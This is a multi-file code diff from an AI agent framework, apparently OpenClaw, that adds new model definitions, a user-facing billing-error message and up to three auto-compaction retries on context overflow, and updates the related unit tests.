||||
"gpt-5.1-codex-mini": {
|
||||
@@ -143,6 +148,7 @@ const DEFAULT_COST = { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 };
|
||||
|
||||
const MODEL_CONTEXT_WINDOWS: Record<string, number> = {
|
||||
"gpt-5.1-codex": 400000,
|
||||
"claude-opus-4-6": 1000000,
|
||||
"claude-opus-4-5": 200000,
|
||||
"gemini-3-pro": 1048576,
|
||||
"gpt-5.1-codex-mini": 400000,
|
||||
@@ -159,6 +165,7 @@ function getDefaultContextWindow(modelId: string): number {
|
||||
|
||||
const MODEL_MAX_TOKENS: Record<string, number> = {
|
||||
"gpt-5.1-codex": 128000,
|
||||
"claude-opus-4-6": 128000,
|
||||
"claude-opus-4-5": 64000,
|
||||
"gemini-3-pro": 65536,
|
||||
"gpt-5.1-codex-mini": 128000,
|
||||
@@ -195,6 +202,7 @@ function buildModelDefinition(modelId: string): ModelDefinitionConfig {
|
||||
*/
|
||||
const MODEL_NAMES: Record<string, string> = {
|
||||
"gpt-5.1-codex": "GPT-5.1 Codex",
|
||||
"claude-opus-4-6": "Claude Opus 4.6",
|
||||
"claude-opus-4-5": "Claude Opus 4.5",
|
||||
"gemini-3-pro": "Gemini 3 Pro",
|
||||
"gpt-5.1-codex-mini": "GPT-5.1 Codex Mini",
|
||||
@@ -222,6 +230,7 @@ function formatModelName(modelId: string): string {
|
||||
export function getOpencodeZenStaticFallbackModels(): ModelDefinitionConfig[] {
|
||||
const modelIds = [
|
||||
"gpt-5.1-codex",
|
||||
"claude-opus-4-6",
|
||||
"claude-opus-4-5",
|
||||
"gemini-3-pro",
|
||||
"gpt-5.1-codex-mini",
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
import type { AssistantMessage } from "@mariozechner/pi-ai";
|
||||
import { describe, expect, it } from "vitest";
|
||||
import { formatAssistantErrorText } from "./pi-embedded-helpers.js";
|
||||
import { BILLING_ERROR_USER_MESSAGE, formatAssistantErrorText } from "./pi-embedded-helpers.js";
|
||||
|
||||
describe("formatAssistantErrorText", () => {
|
||||
const makeAssistantError = (errorMessage: string): AssistantMessage =>
|
||||
@@ -53,4 +53,19 @@ describe("formatAssistantErrorText", () => {
|
||||
);
|
||||
expect(formatAssistantErrorText(msg)).toBe("LLM error server_error: Something exploded");
|
||||
});
|
||||
it("returns a friendly billing message for credit balance errors", () => {
|
||||
const msg = makeAssistantError("Your credit balance is too low to access the Anthropic API.");
|
||||
const result = formatAssistantErrorText(msg);
|
||||
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
|
||||
});
|
||||
it("returns a friendly billing message for HTTP 402 errors", () => {
|
||||
const msg = makeAssistantError("HTTP 402 Payment Required");
|
||||
const result = formatAssistantErrorText(msg);
|
||||
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
|
||||
});
|
||||
it("returns a friendly billing message for insufficient credits", () => {
|
||||
const msg = makeAssistantError("insufficient credits");
|
||||
const result = formatAssistantErrorText(msg);
|
||||
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
|
||||
});
|
||||
});
|
||||
|
||||
@@ -6,6 +6,7 @@ export {
|
||||
stripThoughtSignatures,
|
||||
} from "./pi-embedded-helpers/bootstrap.js";
|
||||
export {
|
||||
BILLING_ERROR_USER_MESSAGE,
|
||||
classifyFailoverReason,
|
||||
formatRawAssistantErrorForUi,
|
||||
formatAssistantErrorText,
|
||||
|
||||
@@ -3,6 +3,9 @@ import type { OpenClawConfig } from "../../config/config.js";
|
||||
import type { FailoverReason } from "./types.js";
|
||||
import { formatSandboxToolPolicyBlockedMessage } from "../sandbox.js";
|
||||
|
||||
export const BILLING_ERROR_USER_MESSAGE =
|
||||
"⚠️ API provider returned a billing error — your API key has run out of credits or has an insufficient balance. Check your provider's billing dashboard and top up or switch to a different API key.";
|
||||
|
||||
export function isContextOverflowError(errorMessage?: string): boolean {
|
||||
if (!errorMessage) {
|
||||
return false;
|
||||
@@ -368,6 +371,10 @@ export function formatAssistantErrorText(
|
||||
return "The AI service is temporarily overloaded. Please try again in a moment.";
|
||||
}
|
||||
|
||||
if (isBillingErrorMessage(raw)) {
|
||||
return BILLING_ERROR_USER_MESSAGE;
|
||||
}
|
||||
|
||||
if (isLikelyHttpErrorText(raw) || isRawApiErrorPayload(raw)) {
|
||||
return formatRawAssistantErrorForUi(raw);
|
||||
}
|
||||
@@ -403,6 +410,10 @@ export function sanitizeUserFacingText(text: string): string {
|
||||
);
|
||||
}
|
||||
|
||||
if (isBillingErrorMessage(trimmed)) {
|
||||
return BILLING_ERROR_USER_MESSAGE;
|
||||
}
|
||||
|
||||
if (isRawApiErrorPayload(trimmed) || isLikelyHttpErrorText(trimmed)) {
|
||||
return formatRawAssistantErrorForUi(trimmed);
|
||||
}
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
import { describe, expect, it, vi } from "vitest";
|
||||
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||
|
||||
vi.mock("../pi-model-discovery.js", () => ({
|
||||
discoverAuthStorage: vi.fn(() => ({ mocked: true })),
|
||||
@@ -6,6 +6,7 @@ vi.mock("../pi-model-discovery.js", () => ({
|
||||
}));
|
||||
|
||||
import type { OpenClawConfig } from "../../config/config.js";
|
||||
import { discoverModels } from "../pi-model-discovery.js";
|
||||
import { buildInlineProviderModels, resolveModel } from "./model.js";
|
||||
|
||||
const makeModel = (id: string) => ({
|
||||
@@ -18,6 +19,12 @@ const makeModel = (id: string) => ({
|
||||
maxTokens: 1,
|
||||
});
|
||||
|
||||
beforeEach(() => {
|
||||
vi.mocked(discoverModels).mockReturnValue({
|
||||
find: vi.fn(() => null),
|
||||
} as unknown as ReturnType<typeof discoverModels>);
|
||||
});
|
||||
|
||||
describe("buildInlineProviderModels", () => {
|
||||
it("attaches provider ids to inline models", () => {
|
||||
const providers = {
|
||||
@@ -127,4 +134,74 @@ describe("resolveModel", () => {
|
||||
expect(result.model?.provider).toBe("custom");
|
||||
expect(result.model?.id).toBe("missing-model");
|
||||
});
|
||||
|
||||
it("builds an openai-codex fallback for gpt-5.3-codex", () => {
|
||||
const templateModel = {
|
||||
id: "gpt-5.2-codex",
|
||||
name: "GPT-5.2 Codex",
|
||||
provider: "openai-codex",
|
||||
api: "openai-codex-responses",
|
||||
baseUrl: "https://chatgpt.com/backend-api",
|
||||
reasoning: true,
|
||||
input: ["text", "image"] as const,
|
||||
cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 },
|
||||
contextWindow: 272000,
|
||||
maxTokens: 128000,
|
||||
};
|
||||
|
||||
vi.mocked(discoverModels).mockReturnValue({
|
||||
find: vi.fn((provider: string, modelId: string) => {
|
||||
if (provider === "openai-codex" && modelId === "gpt-5.2-codex") {
|
||||
return templateModel;
|
||||
}
|
||||
return null;
|
||||
}),
|
||||
} as unknown as ReturnType<typeof discoverModels>);
|
||||
|
||||
const result = resolveModel("openai-codex", "gpt-5.3-codex", "/tmp/agent");
|
||||
|
||||
expect(result.error).toBeUndefined();
|
||||
expect(result.model).toMatchObject({
|
||||
provider: "openai-codex",
|
||||
id: "gpt-5.3-codex",
|
||||
api: "openai-codex-responses",
|
||||
baseUrl: "https://chatgpt.com/backend-api",
|
||||
reasoning: true,
|
||||
contextWindow: 272000,
|
||||
maxTokens: 128000,
|
||||
});
|
||||
});
|
||||
|
||||
it("keeps unknown-model errors for non-gpt-5 openai-codex ids", () => {
|
||||
const result = resolveModel("openai-codex", "gpt-4.1-mini", "/tmp/agent");
|
||||
expect(result.model).toBeUndefined();
|
||||
expect(result.error).toBe("Unknown model: openai-codex/gpt-4.1-mini");
|
||||
});
|
||||
|
||||
it("uses codex fallback even when openai-codex provider is configured", () => {
|
||||
// This test verifies the ordering: codex fallback must fire BEFORE the generic providerCfg fallback.
|
||||
// If ordering is wrong, the generic fallback would use api: "openai-responses" (the default)
|
||||
// instead of "openai-codex-responses".
|
||||
const cfg: OpenClawConfig = {
|
||||
models: {
|
||||
providers: {
|
||||
"openai-codex": {
|
||||
baseUrl: "https://custom.example.com",
|
||||
// No models array, or models without gpt-5.3-codex
|
||||
},
|
||||
},
|
||||
},
|
||||
} as OpenClawConfig;
|
||||
|
||||
vi.mocked(discoverModels).mockReturnValue({
|
||||
find: vi.fn(() => null),
|
||||
} as unknown as ReturnType<typeof discoverModels>);
|
||||
|
||||
const result = resolveModel("openai-codex", "gpt-5.3-codex", "/tmp/agent", cfg);
|
||||
|
||||
expect(result.error).toBeUndefined();
|
||||
expect(result.model?.api).toBe("openai-codex-responses");
|
||||
expect(result.model?.id).toBe("gpt-5.3-codex");
|
||||
expect(result.model?.provider).toBe("openai-codex");
|
||||
});
|
||||
});
|
||||
|
||||
@@ -19,6 +19,50 @@ type InlineProviderConfig = {
|
||||
models?: ModelDefinitionConfig[];
|
||||
};
|
||||
|
||||
const OPENAI_CODEX_GPT_53_MODEL_ID = "gpt-5.3-codex";
|
||||
|
||||
const OPENAI_CODEX_TEMPLATE_MODEL_IDS = ["gpt-5.2-codex"] as const;
|
||||
|
||||
function resolveOpenAICodexGpt53FallbackModel(
|
||||
provider: string,
|
||||
modelId: string,
|
||||
modelRegistry: ModelRegistry,
|
||||
): Model<Api> | undefined {
|
||||
const normalizedProvider = normalizeProviderId(provider);
|
||||
const trimmedModelId = modelId.trim();
|
||||
if (normalizedProvider !== "openai-codex") {
|
||||
return undefined;
|
||||
}
|
||||
if (trimmedModelId.toLowerCase() !== OPENAI_CODEX_GPT_53_MODEL_ID) {
|
||||
return undefined;
|
||||
}
|
||||
|
||||
for (const templateId of OPENAI_CODEX_TEMPLATE_MODEL_IDS) {
|
||||
const template = modelRegistry.find(normalizedProvider, templateId) as Model<Api> | null;
|
||||
if (!template) {
|
||||
continue;
|
||||
}
|
||||
return normalizeModelCompat({
|
||||
...template,
|
||||
id: trimmedModelId,
|
||||
name: trimmedModelId,
|
||||
} as Model<Api>);
|
||||
}
|
||||
|
||||
return normalizeModelCompat({
|
||||
id: trimmedModelId,
|
||||
name: trimmedModelId,
|
||||
api: "openai-codex-responses",
|
||||
provider: normalizedProvider,
|
||||
baseUrl: "https://chatgpt.com/backend-api",
|
||||
reasoning: true,
|
||||
input: ["text", "image"],
|
||||
cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
|
||||
contextWindow: DEFAULT_CONTEXT_TOKENS,
|
||||
maxTokens: DEFAULT_CONTEXT_TOKENS,
|
||||
} as Model<Api>);
|
||||
}
|
||||
|
||||
export function buildInlineProviderModels(
|
||||
providers: Record<string, InlineProviderConfig>,
|
||||
): InlineModelEntry[] {
|
||||
@@ -85,6 +129,17 @@ export function resolveModel(
|
||||
modelRegistry,
|
||||
};
|
||||
}
|
||||
// Codex gpt-5.3 forward-compat fallback must be checked BEFORE the generic providerCfg fallback.
|
||||
// Otherwise, if cfg.models.providers["openai-codex"] is configured, the generic fallback fires
|
||||
// with api: "openai-responses" instead of the correct "openai-codex-responses".
|
||||
const codexForwardCompat = resolveOpenAICodexGpt53FallbackModel(
|
||||
provider,
|
||||
modelId,
|
||||
modelRegistry,
|
||||
);
|
||||
if (codexForwardCompat) {
|
||||
return { model: codexForwardCompat, authStorage, modelRegistry };
|
||||
}
|
||||
const providerCfg = providers[provider];
|
||||
if (providerCfg || modelId.startsWith("mock-")) {
|
||||
const fallbackModel: Model<Api> = normalizeModelCompat({
|
||||
|
||||
@@ -137,6 +137,7 @@ vi.mock("../pi-embedded-helpers.js", async () => {
|
||||
isFailoverErrorMessage: vi.fn(() => false),
|
||||
isAuthAssistantError: vi.fn(() => false),
|
||||
isRateLimitAssistantError: vi.fn(() => false),
|
||||
isBillingAssistantError: vi.fn(() => false),
|
||||
classifyFailoverReason: vi.fn(() => null),
|
||||
formatAssistantErrorText: vi.fn(() => ""),
|
||||
pickFallbackThinkingLevel: vi.fn(() => null),
|
||||
@@ -214,7 +215,9 @@ describe("overflow compaction in run loop", () => {
|
||||
);
|
||||
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(2);
|
||||
expect(log.warn).toHaveBeenCalledWith(
|
||||
expect.stringContaining("context overflow detected; attempting auto-compaction"),
|
||||
expect.stringContaining(
|
||||
"context overflow detected (attempt 1/3); attempting auto-compaction",
|
||||
),
|
||||
);
|
||||
expect(log.info).toHaveBeenCalledWith(expect.stringContaining("auto-compaction succeeded"));
|
||||
// Should not be an error result
|
||||
@@ -241,31 +244,68 @@ describe("overflow compaction in run loop", () => {
|
||||
expect(log.warn).toHaveBeenCalledWith(expect.stringContaining("auto-compaction failed"));
|
||||
});
|
||||
|
||||
it("returns error if overflow happens again after compaction", async () => {
|
||||
it("retries compaction up to 3 times before giving up", async () => {
|
||||
const overflowError = new Error("request_too_large: Request size exceeds model context window");
|
||||
|
||||
// 4 overflow errors: 3 compaction retries + final failure
|
||||
mockedRunEmbeddedAttempt
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }));
|
||||
|
||||
mockedCompactDirect
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 1", firstKeptEntryId: "entry-3", tokensBefore: 180000 },
|
||||
})
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 2", firstKeptEntryId: "entry-5", tokensBefore: 160000 },
|
||||
})
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 3", firstKeptEntryId: "entry-7", tokensBefore: 140000 },
|
||||
});
|
||||
|
||||
const result = await runEmbeddedPiAgent(baseParams);
|
||||
|
||||
// Compaction attempted 3 times (max)
|
||||
expect(mockedCompactDirect).toHaveBeenCalledTimes(3);
|
||||
// 4 attempts: 3 overflow+compact+retry cycles + final overflow → error
|
||||
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(4);
|
||||
expect(result.meta.error?.kind).toBe("context_overflow");
|
||||
expect(result.payloads?.[0]?.isError).toBe(true);
|
||||
});
|
||||
|
||||
it("succeeds after second compaction attempt", async () => {
|
||||
const overflowError = new Error("request_too_large: Request size exceeds model context window");
|
||||
|
||||
mockedRunEmbeddedAttempt
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }));
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: null }));
|
||||
|
||||
mockedCompactDirect.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: {
|
||||
summary: "Compacted",
|
||||
firstKeptEntryId: "entry-3",
|
||||
tokensBefore: 180000,
|
||||
},
|
||||
});
|
||||
mockedCompactDirect
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 1", firstKeptEntryId: "entry-3", tokensBefore: 180000 },
|
||||
})
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 2", firstKeptEntryId: "entry-5", tokensBefore: 160000 },
|
||||
});
|
||||
|
||||
const result = await runEmbeddedPiAgent(baseParams);
|
||||
|
||||
// Compaction attempted only once
|
||||
expect(mockedCompactDirect).toHaveBeenCalledTimes(1);
|
||||
// Two attempts: first overflow -> compact -> retry -> second overflow -> return error
|
||||
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(2);
|
||||
expect(result.meta.error?.kind).toBe("context_overflow");
|
||||
expect(result.payloads?.[0]?.isError).toBe(true);
|
||||
expect(mockedCompactDirect).toHaveBeenCalledTimes(2);
|
||||
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(3);
|
||||
expect(result.meta.error).toBeUndefined();
|
||||
});
|
||||
|
||||
it("does not attempt compaction for compaction_failure errors", async () => {
|
||||
|
||||
@@ -29,9 +29,11 @@ import {
|
||||
import { normalizeProviderId } from "../model-selection.js";
|
||||
import { ensureOpenClawModelsJson } from "../models-config.js";
|
||||
import {
|
||||
BILLING_ERROR_USER_MESSAGE,
|
||||
classifyFailoverReason,
|
||||
formatAssistantErrorText,
|
||||
isAuthAssistantError,
|
||||
isBillingAssistantError,
|
||||
isCompactionFailureError,
|
||||
isContextOverflowError,
|
||||
isFailoverAssistantError,
|
||||
@@ -303,7 +305,8 @@ export async function runEmbeddedPiAgent(
|
||||
}
|
||||
}
|
||||
|
||||
let overflowCompactionAttempted = false;
|
||||
const MAX_OVERFLOW_COMPACTION_ATTEMPTS = 3;
|
||||
let overflowCompactionAttempts = 0;
|
||||
try {
|
||||
while (true) {
|
||||
attemptedThinking.add(thinkLevel);
|
||||
@@ -373,13 +376,23 @@ export async function runEmbeddedPiAgent(
|
||||
if (promptError && !aborted) {
|
||||
const errorText = describeUnknownError(promptError);
|
||||
if (isContextOverflowError(errorText)) {
|
||||
const msgCount = attempt.messagesSnapshot?.length ?? 0;
|
||||
log.warn(
|
||||
`[context-overflow-diag] sessionKey=${params.sessionKey ?? params.sessionId} ` +
|
||||
`provider=${provider}/${modelId} messages=${msgCount} ` +
|
||||
`sessionFile=${params.sessionFile} compactionAttempts=${overflowCompactionAttempts} ` +
|
||||
`error=${errorText.slice(0, 200)}`,
|
||||
);
|
||||
const isCompactionFailure = isCompactionFailureError(errorText);
|
||||
// Attempt auto-compaction on context overflow (not compaction_failure)
|
||||
if (!isCompactionFailure && !overflowCompactionAttempted) {
|
||||
if (
|
||||
!isCompactionFailure &&
|
||||
overflowCompactionAttempts < MAX_OVERFLOW_COMPACTION_ATTEMPTS
|
||||
) {
|
||||
overflowCompactionAttempts++;
|
||||
log.warn(
|
||||
`context overflow detected; attempting auto-compaction for ${provider}/${modelId}`,
|
||||
`context overflow detected (attempt ${overflowCompactionAttempts}/${MAX_OVERFLOW_COMPACTION_ATTEMPTS}); attempting auto-compaction for ${provider}/${modelId}`,
|
||||
);
|
||||
overflowCompactionAttempted = true;
|
||||
const compactResult = await compactEmbeddedPiSessionDirect({
|
||||
sessionId: params.sessionId,
|
||||
sessionKey: params.sessionKey,
|
||||
@@ -538,6 +551,7 @@ export async function runEmbeddedPiAgent(
|
||||
|
||||
const authFailure = isAuthAssistantError(lastAssistant);
|
||||
const rateLimitFailure = isRateLimitAssistantError(lastAssistant);
|
||||
const billingFailure = isBillingAssistantError(lastAssistant);
|
||||
const failoverFailure = isFailoverAssistantError(lastAssistant);
|
||||
const assistantFailoverReason = classifyFailoverReason(lastAssistant?.errorMessage ?? "");
|
||||
const cloudCodeAssistFormatError = attempt.cloudCodeAssistFormatError;
|
||||
@@ -609,9 +623,11 @@ export async function runEmbeddedPiAgent(
|
||||
? "LLM request timed out."
|
||||
: rateLimitFailure
|
||||
? "LLM request rate limited."
|
||||
: authFailure
|
||||
? "LLM request unauthorized."
|
||||
: "LLM request failed.");
|
||||
: billingFailure
|
||||
? BILLING_ERROR_USER_MESSAGE
|
||||
: authFailure
|
||||
? "LLM request unauthorized."
|
||||
: "LLM request failed.");
|
||||
const status =
|
||||
resolveFailoverStatus(assistantFailoverReason ?? "unknown") ??
|
||||
(isTimeoutErrorMessage(message) ? 408 : undefined);
|
||||
|
||||
@@ -1,10 +1,50 @@
|
||||
import fs from "node:fs";
|
||||
import os from "node:os";
|
||||
import path from "node:path";
|
||||
import { describe, expect, it, vi } from "vitest";
|
||||
import { afterAll, beforeAll, describe, expect, it, vi } from "vitest";
|
||||
import type { OpenClawConfig } from "../config/config.js";
|
||||
import type { ExecApprovalsResolved } from "../infra/exec-approvals.js";
|
||||
import { createOpenClawCodingTools } from "./pi-tools.js";
|
||||
|
||||
const previousBundledPluginsDir = process.env.OPENCLAW_BUNDLED_PLUGINS_DIR;
|
||||
|
||||
beforeAll(() => {
|
||||
process.env.OPENCLAW_BUNDLED_PLUGINS_DIR = path.join(
|
||||
os.tmpdir(),
|
||||
"openclaw-test-no-bundled-extensions",
|
||||
);
|
||||
});
|
||||
|
||||
afterAll(() => {
|
||||
if (previousBundledPluginsDir === undefined) {
|
||||
delete process.env.OPENCLAW_BUNDLED_PLUGINS_DIR;
|
||||
} else {
|
||||
process.env.OPENCLAW_BUNDLED_PLUGINS_DIR = previousBundledPluginsDir;
|
||||
}
|
||||
});
|
||||
|
||||
vi.mock("../infra/shell-env.js", async (importOriginal) => {
|
||||
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
|
||||
return {
|
||||
...mod,
|
||||
getShellPathFromLoginShell: vi.fn(() => "/usr/bin:/bin"),
|
||||
resolveShellEnvFallbackTimeoutMs: vi.fn(() => 500),
|
||||
};
|
||||
});
|
||||
|
||||
vi.mock("../plugins/tools.js", () => ({
|
||||
getPluginToolMeta: () => undefined,
|
||||
resolvePluginTools: () => [],
|
||||
}));
|
||||
|
||||
vi.mock("../infra/shell-env.js", async (importOriginal) => {
|
||||
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
|
||||
return { ...mod, getShellPathFromLoginShell: () => null };
|
||||
});
|
||||
|
||||
vi.mock("../plugins/tools.js", () => ({
|
||||
resolvePluginTools: () => [],
|
||||
getPluginToolMeta: () => undefined,
|
||||
}));
|
||||
|
||||
vi.mock("../infra/exec-approvals.js", async (importOriginal) => {
|
||||
const mod = await importOriginal<typeof import("../infra/exec-approvals.js")>();
|
||||
@@ -46,6 +86,7 @@ describe("createOpenClawCodingTools safeBins", () => {
|
||||
return;
|
||||
}
|
||||
|
||||
const { createOpenClawCodingTools } = await import("./pi-tools.js");
|
||||
const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-safe-bins-"));
|
||||
const cfg: OpenClawConfig = {
|
||||
tools: {
|
||||
@@ -68,10 +109,22 @@ describe("createOpenClawCodingTools safeBins", () => {
|
||||
expect(execTool).toBeDefined();
|
||||
|
||||
const marker = `safe-bins-${Date.now()}`;
|
||||
const result = await execTool!.execute("call1", {
|
||||
command: `echo ${marker}`,
|
||||
workdir: tmpDir,
|
||||
});
|
||||
const prevShellEnvTimeoutMs = process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS;
|
||||
process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS = "1000";
|
||||
const result = await (async () => {
|
||||
try {
|
||||
return await execTool!.execute("call1", {
|
||||
command: `echo ${marker}`,
|
||||
workdir: tmpDir,
|
||||
});
|
||||
} finally {
|
||||
if (prevShellEnvTimeoutMs === undefined) {
|
||||
delete process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS;
|
||||
} else {
|
||||
process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS = prevShellEnvTimeoutMs;
|
||||
}
|
||||
}
|
||||
})();
|
||||
const text = result.content.find((content) => content.type === "text")?.text ?? "";
|
||||
|
||||
expect(result.details.status).toBe("completed");
|
||||
|
||||
@@ -1,9 +1,18 @@
|
||||
import fs from "node:fs/promises";
|
||||
import os from "node:os";
|
||||
import path from "node:path";
|
||||
import { describe, expect, it } from "vitest";
|
||||
import { describe, expect, it, vi } from "vitest";
|
||||
import { createOpenClawCodingTools } from "./pi-tools.js";
|
||||
|
||||
vi.mock("../plugins/tools.js", () => ({
|
||||
getPluginToolMeta: () => undefined,
|
||||
resolvePluginTools: () => [],
|
||||
}));
|
||||
|
||||
vi.mock("../infra/shell-env.js", async (importOriginal) => {
|
||||
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
|
||||
return { ...mod, getShellPathFromLoginShell: () => null };
|
||||
});
|
||||
async function withTempDir<T>(prefix: string, fn: (dir: string) => Promise<T>) {
|
||||
const dir = await fs.mkdtemp(path.join(os.tmpdir(), prefix));
|
||||
try {
|
||||
@@ -22,12 +31,11 @@ describe("workspace path resolution", () => {
|
||||
it("reads relative paths against workspaceDir even after cwd changes", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
await withTempDir("openclaw-cwd-", async (otherDir) => {
|
||||
const prevCwd = process.cwd();
|
||||
const testFile = "read.txt";
|
||||
const contents = "workspace read ok";
|
||||
await fs.writeFile(path.join(workspaceDir, testFile), contents, "utf8");
|
||||
|
||||
process.chdir(otherDir);
|
||||
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
|
||||
try {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const readTool = tools.find((tool) => tool.name === "read");
|
||||
@@ -36,7 +44,7 @@ describe("workspace path resolution", () => {
|
||||
const result = await readTool?.execute("ws-read", { path: testFile });
|
||||
expect(getTextContent(result)).toContain(contents);
|
||||
} finally {
|
||||
process.chdir(prevCwd);
|
||||
cwdSpy.mockRestore();
|
||||
}
|
||||
});
|
||||
});
|
||||
@@ -45,11 +53,10 @@ describe("workspace path resolution", () => {
|
||||
it("writes relative paths against workspaceDir even after cwd changes", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
await withTempDir("openclaw-cwd-", async (otherDir) => {
|
||||
const prevCwd = process.cwd();
|
||||
const testFile = "write.txt";
|
||||
const contents = "workspace write ok";
|
||||
|
||||
process.chdir(otherDir);
|
||||
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
|
||||
try {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const writeTool = tools.find((tool) => tool.name === "write");
|
||||
@@ -63,7 +70,7 @@ describe("workspace path resolution", () => {
|
||||
const written = await fs.readFile(path.join(workspaceDir, testFile), "utf8");
|
||||
expect(written).toBe(contents);
|
||||
} finally {
|
||||
process.chdir(prevCwd);
|
||||
cwdSpy.mockRestore();
|
||||
}
|
||||
});
|
||||
});
|
||||
@@ -72,11 +79,10 @@ describe("workspace path resolution", () => {
|
||||
it("edits relative paths against workspaceDir even after cwd changes", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
await withTempDir("openclaw-cwd-", async (otherDir) => {
|
||||
const prevCwd = process.cwd();
|
||||
const testFile = "edit.txt";
|
||||
await fs.writeFile(path.join(workspaceDir, testFile), "hello world", "utf8");
|
||||
|
||||
process.chdir(otherDir);
|
||||
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
|
||||
try {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const editTool = tools.find((tool) => tool.name === "edit");
|
||||
@@ -91,7 +97,7 @@ describe("workspace path resolution", () => {
|
||||
const updated = await fs.readFile(path.join(workspaceDir, testFile), "utf8");
|
||||
expect(updated).toBe("hello openclaw");
|
||||
} finally {
|
||||
process.chdir(prevCwd);
|
||||
cwdSpy.mockRestore();
|
||||
}
|
||||
});
|
||||
});
|
||||
@@ -99,7 +105,7 @@ describe("workspace path resolution", () => {
|
||||
|
||||
it("defaults exec cwd to workspaceDir when workdir is omitted", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const tools = createOpenClawCodingTools({ workspaceDir, exec: { host: "gateway" } });
|
||||
const execTool = tools.find((tool) => tool.name === "exec");
|
||||
expect(execTool).toBeDefined();
|
||||
|
||||
@@ -122,7 +128,7 @@ describe("workspace path resolution", () => {
|
||||
it("lets exec workdir override the workspace default", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
await withTempDir("openclaw-override-", async (overrideDir) => {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const tools = createOpenClawCodingTools({ workspaceDir, exec: { host: "gateway" } });
|
||||
const execTool = tools.find((tool) => tool.name === "exec");
|
||||
expect(execTool).toBeDefined();
|
||||
|
||||
|
||||
@@ -3,6 +3,7 @@ import { describe, expect, it } from "vitest";
|
||||
import {
|
||||
sanitizeToolCallInputs,
|
||||
sanitizeToolUseResultPairing,
|
||||
repairToolUseResultPairing,
|
||||
} from "./session-transcript-repair.js";
|
||||
|
||||
describe("sanitizeToolUseResultPairing", () => {
|
||||
@@ -112,6 +113,100 @@ describe("sanitizeToolUseResultPairing", () => {
|
||||
expect(out.some((m) => m.role === "toolResult")).toBe(false);
|
||||
expect(out.map((m) => m.role)).toEqual(["user", "assistant"]);
|
||||
});
|
||||
|
||||
it("skips tool call extraction for assistant messages with stopReason 'error'", () => {
|
||||
// When an assistant message has stopReason: "error", its tool_use blocks may be
|
||||
// incomplete/malformed. We should NOT create synthetic tool_results for them,
|
||||
// as this causes API 400 errors: "unexpected tool_use_id found in tool_result blocks"
|
||||
const input = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "toolCall", id: "call_error", name: "exec", arguments: {} }],
|
||||
stopReason: "error",
|
||||
},
|
||||
{ role: "user", content: "something went wrong" },
|
||||
] as AgentMessage[];
|
||||
|
||||
const result = repairToolUseResultPairing(input);
|
||||
|
||||
// Should NOT add synthetic tool results for errored messages
|
||||
expect(result.added).toHaveLength(0);
|
||||
// The assistant message should be passed through unchanged
|
||||
expect(result.messages[0]?.role).toBe("assistant");
|
||||
expect(result.messages[1]?.role).toBe("user");
|
||||
expect(result.messages).toHaveLength(2);
|
||||
});
|
||||
|
||||
it("skips tool call extraction for assistant messages with stopReason 'aborted'", () => {
|
||||
// When a request is aborted mid-stream, the assistant message may have incomplete
|
||||
// tool_use blocks (with partialJson). We should NOT create synthetic tool_results.
|
||||
const input = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "toolCall", id: "call_aborted", name: "Bash", arguments: {} }],
|
||||
stopReason: "aborted",
|
||||
},
|
||||
